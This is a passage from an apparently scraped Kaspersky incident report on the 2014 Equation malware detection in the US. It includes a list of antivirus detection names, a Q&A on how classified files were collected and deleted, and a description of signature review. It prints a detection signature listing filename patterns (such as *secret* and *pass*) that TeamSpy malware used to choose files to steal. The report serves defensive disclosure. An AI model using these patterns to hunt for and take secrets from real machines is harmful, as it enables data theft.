\nnot-a-virus:AdWare.Win32.Shopper.adw \nnot-a-virus:Downloader.NSIS.Agent.am \nnot-a-virus:Downloader.NSIS.Agent.an \nnot-a-virus:Downloader.NSIS.Agent.as \nnot-a-virus:Downloader.NSIS.Agent.go \nnot-a-virus:Downloader.NSIS.Agent.lf \nnot-a-virus:Downloader.NSIS.OutBrowse.a \nnot-a-virus:Downloader.Win32.Agent.bxib \nnot-a-virus:Monitor.Win32.Hooker.br \nnot-a-virus:Monitor.Win32.KeyLogger.xh \nnot-a-virus:PSWTool.Win32.Cain.bp \nnot-a-virus:PSWTool.Win32.Cain.bq \nnot-a-virus:PSWTool.Win32.CredDump.a \nnot-a-virus:PSWTool.Win32.FirePass.ia \nnot-a-virus:PSWTool.Win32.NetPass.amv \nnot-a-virus:PSWTool.Win32.PWDump.3 \nnot-a-virus:PSWTool.Win32.PWDump.4 \nnot-a-virus:PSWTool.Win32.PWDump.5 \nnot-a-virus:PSWTool.Win32.PWDump.ar \nnot-a-virus:PSWTool.Win32.PWDump.at \nnot-a-virus:PSWTool.Win32.PWDump.bey \nnot-a-virus:PSWTool.Win32.PWDump.bkr \nnot-a-virus:PSWTool.Win32.PWDump.bve \nnot-a-virus:PSWTool.Win32.PWDump.f \nnot-a-virus:PSWTool.Win32.PWDump.sa \nnot-a-virus:PSWTool.Win32.PWDump.yx \nnot-a-virus:RiskTool.Win32.WinCred.gen \nnot-a-virus:RiskTool.Win64.WinCred.a \nnot-a-virus:WebToolbar.JS.Condonit.a \nnot-a-virus:WebToolbar.Win32.Agent.avl \nnot-a-virus:WebToolbar.Win32.Cossder.updv \nnot-a-virus:WebToolbar.Win32.Cossder.uubg \nnot-a-virus:WebToolbar.Win32.MyWebSearch.sv \nPDM:Trojan.Win32.Badur.a \nTrojan-Banker.Win32.Agent.kan \nTrojan-Downloader.Win32.Genome.jlcv \nTrojan-Dropper.Win32.Injector.jqmj \nTrojan-Dropper.Win32.Injector.ktep \nTrojan-FakeAV.Win64.Agent.j \nTrojan-Ransom.Win32.ZedoPoo.phd \nTrojan.Java.Agent.at \nTrojan.Win32.Adond.lbgp \nTrojan.Win32.Buzus.umzt \nTrojan.Win32.Buzus.uuzf \nTrojan.Win32.Diple.fygv \nTrojan.Win32.Genome.amqoa \nTrojan.Win32.Genome.amtor \nTrojan.Win32.Genome.kpzv \nTrojan.Win32.Genome.ngd \nTrojan.Win32.Inject.euxi \nTrojan.Win32.Starter.ceg \nTrojan.Win32.Swisyn.aaig \nUDS:DangerousObject.Multi.Generic \nUFO:(blocked) \nVirTool.Win32.Rootkit \nVirTool.Win32.Topo.12 \nVirus.Win32.Suspic.gen \nWMUF:(blocked)\n\n## Conclusions\n\nAt this point, we had the answers to the questions we felt could be answered. To summarize, we will address each one below:\n\n**Q1** - Was our software used outside of its intended functionality to pull classified information from a person's computer?\n\n**A1** - The software performed as expected and notified our analysts of alerts on signatures written to detect on Equation group malware that was actively under investigation. In no way was the software used outside of this scope to either pull back additional files that did not fire on a malware signature or were not part of the archive that fired on these signatures.\n\n**Q2** - When did this incident occur?\n\n**A2** - In our professional opinion, the incident spanned between September 11, 2014 and November 17, 2014.\n\n**Q3** - Who was this person?\n\n**A3** - Because our software anonymizes certain aspects of users' information, we are unable to pinpoint specifically who the user was. Even if we could, disclosing such information is against our policies and ethical standards. What we can determine is that the user was originating from an IP address that is supposedly assigned to a Verizon FiOS address pool for the Baltimore, MD and surrounding area.\n\n**Q4** - Was there actually classified information found on the system inadvertently?\n\n**A4** - What is believed to be potentially classified information was pulled back because it was contained within an archive that fired on an Equation specific malware signatures. Besides malware, the archive also contained what appeared to be source code for Equation malware and four Word documents bearing classification markings.\n\n**Q5** - If classified information was pulled back, what happened to said data after? Was it handled appropriately?\n\n**A5** - After discovering the suspected Equation malware source code and classified documents, the analyst reported the incident to the CEO. Following a request from the CEO, the archive was deleted from all of our systems. With the archive that contained the classified information being subsequently removed from our storage locations, only traces of its detection remain in our system (i.e. \u2013 statistics and some metadata). We cannot assess whether the data was \"handled appropriately\" (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so.\n\n**Q6 \u2013 **Why was the data pulled back in the first place? Is the evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n\n**A6 - **The information was pulled back because the archive fired on multiple Equation malware signatures. We also found no indication the information ever left our corporate networks. Transfer of a malware file is done with appropriate encryption level relying on RSA+AES with an acceptable key length, which should exclude attempts to intercept such data anywhere on the network between our security software and the analyst receiving the file.\n\n**Q7** - What types of files were gathered from the supposed system?\n\n**A7** - Based on statistics, the files that were submitted to Kaspersky Lab were mostly malware samples and suspected malicious files, either stand-alone, or inside a 7zip archive. The only files stored to date still in our sample collection from this incident are malicious binaries.\n\n**Q8** - Do we have any indication the user was subsequently \"hacked\" by Russian actors and data exfiltrated?\n\n**A8** - Based on the detections and alerts found in the investigation, the system was most likely compromised during this time frame by unknown threat actors. We asses this from the fact that the user installed a backdoored MS Office 2013 illegal activation tool, detected by our products as Backdoor.Win32.Mokes.hvl. To run this malware, the user must have disabled the AV protection, since running it with the antivirus enabled would not have been possible. This malicious software is a Trojan (later identified as \"Smoke Bot\" or \"Smoke Loader\") allegedly created by a Russian hacker in 2011 and made available on [Russian underground forums](<http://xaker.name/threads/22008/>) for purchase. During the period of September 2014-November 2014, the command and control servers of this malware were registered to presumably a Chinese entity going by the name \"Zhou Lou\", from Hunan, using the e-mail address \"zhoulu823@gmail.com\". We are still working on this and further details on this malware might be made available later as a separate research paper.\n\nOf course, the possibility exists that there may have been other malware on the system which our engines did not detect at the time of research. Given that system owner's potential clearance level, the user could have been a prime target of nation states. Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands. What we are certain about is that any non-malware data that we received based on passive consent of the user was deleted from our storage.\n\n**Q9** - Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n\n**A9** - Kaspersky Lab security software, like all other similar solutions from our competitors, has privileged access to computer systems to be able to resist serious malware infections and return control of the infected system back to the user. This level of access allows our software to see any file on the systems that we protect. With great access comes great responsibility and that is why a procedure to create a signature that would request a file from a user's computer has to be carefully handled. Kaspersky malware analysts have rights to create signatures. Once created, these signatures are reviewed and committed by another group within Kaspersky Lab to ensure proper checks and balances. If there were an external attempt to create a signature, that creation would be visible not only in internal databases and historical records, but also via external monitoring of all our released signatures by third parties. Considering that our signatures are regularly reversed by other researchers, competitors, and offensive research companies, if any morally questionable signatures ever existed it would have already been discovered. Our internal analysis and searching revealed no such signatures as well.\n\nIn relation to Equation research specifically, our checks verified that during 2014-2016, none of the researchers working on Equation possessed the rights to commit signatures directly without having an experienced signature developer verifying those. If there was a doubtful intention in signatures during the hunt for Equation samples, this would have been questioned and reported by a lead signature developer.\n\n**Q10** - Assuming cyberspies were able to see screens of our analysts, what could they find on it and how could that be interpreted?\n\n**A10** - We have done a thorough search for keywords and classification markings in our signature databases. The result was negative: we never created any signatures on known classification markings. However, during this sweep we discovered something interesting in relation to TeamSpy research that we published earlier (for more details we recommend to check the original research at https://securelist.com/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/35520/). TeamSpy malware was designed to automatically collect certain files that fell into the interest of the attackers. They defined a list of file extensions, such as office documents (*.doc, *.rtf, *.xls, *.mdb), pdf files (*.pdf) and more. In addition, they used wildcard string pattern based on keywords in the file names, such as *pass*, *secret*, *saidumlo* (meaning \"secret\" in Georgian) and others. These patterns were hardcoded into the malware that we discovered earlier, and could be used to detect similar malware samples. We did discover a signature created by a malware analyst in 2015 that was looking for the following patterns:\n\n * *saidumlo*\n * *secret*.*\n * *.xls\n * *.pdf\n * *.pgp\n * *pass*.*\n\nThese strings had to be located in the body of the malware dump from a sandbox processed sample. In addition, the malware analyst included another indicator to avoid false positives; A path where the malware dropper stored dropped files: ProgramData\\Adobe\\AdobeARM.\n\nOne could theorize about an intelligence operator monitoring a malware analyst's work in the process of entering these strings during the creation of a signature. We cannot say for sure, but it is a possibility that an attacker looking for anything that can expose our company from a negative side, observations like this may work as a trigger for a biased mind. Despite the intentions of the malware analyst, they could have been interpreted wrongly and used to create false allegations against us, supported by screenshots displaying these or similar strings.\n\nMany people including security researchers, governments, and even our direct competitors from the private sector have approached us to express support. It is appalling to see that accusations against our company continue to appear without any proof or factual information being presented. Rumors, anonymous sources, and lack of hard evidence spreads only fear, uncertainty and doubt. We hope that this report sheds some long-overdue light to the public and allows people to draw their own conclusions based on the facts presented above. We are also open and willing to do more, should that be required.\n\n[ **Appendix: Analysis of the Mokes/SmokeBot backdoor from the incident](<https://securelist.com/files/2017/11/Appendix_Mokes-SmokeBot_analysis.pdf>)", "modified": "2017-11-16T10:00:34", "published": "2017-11-16T10:00:34", "href": "https://securelist.com/investigation-report-for-the-september-2014-equation-malware-detection-incident-in-the-us/83210/", "id": "SECURELIST:FA58963C07F2F288FA3096096F60BCF3", "type": "securelist", "title": "Investigation Report for the September 2014 Equation malware detection incident in the US", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
